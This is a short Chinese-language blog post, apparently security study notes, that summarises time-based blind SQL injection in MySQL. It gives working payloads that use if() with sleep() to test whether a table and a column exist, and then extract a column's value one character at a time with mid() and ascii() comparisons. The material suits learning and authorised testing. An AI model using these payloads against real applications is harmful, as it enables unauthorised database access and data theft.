QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

延时注入小结

07 Aug 2019 » 习信息安全系列

[TOC]

mysql> select sleep(3);
+----------+
| sleep(3) |
+----------+
|        0 |
+----------+

mysql> select name from users limit 1;
+----------+
| name     |
+----------+
| XiaoMing |
+----------+

判断是否存在users表名

select * from users where id=1 and 0=if((select count(*) from users),sleep(3),1);

select * from users where id=1 and if((select count(*) from users),sleep(3),1);

判断是否存在name字段

select * from users where id=1 and 0=if((select count(name) from users),sleep(3),1);

select * from users where id=1 and if((select count(name) from users),sleep(3),1);

延时取出name字段数据

select * from users where id=1 and if(('g' = mid((select name from users limit 1),8,1)),sleep(3),1);

**利用ascii码取出 name字段数据 **

select * from users where id=1 and if((ascii(mid((select name from users limit 1),1,1))=88),sleep(3),1);



select * from users where id=1 and if((ascii(mid((select name from users limit 1),2,1))=105),sleep(3),1);

「 转载请声明博客地址及APT086&QQ愛安全实验室 」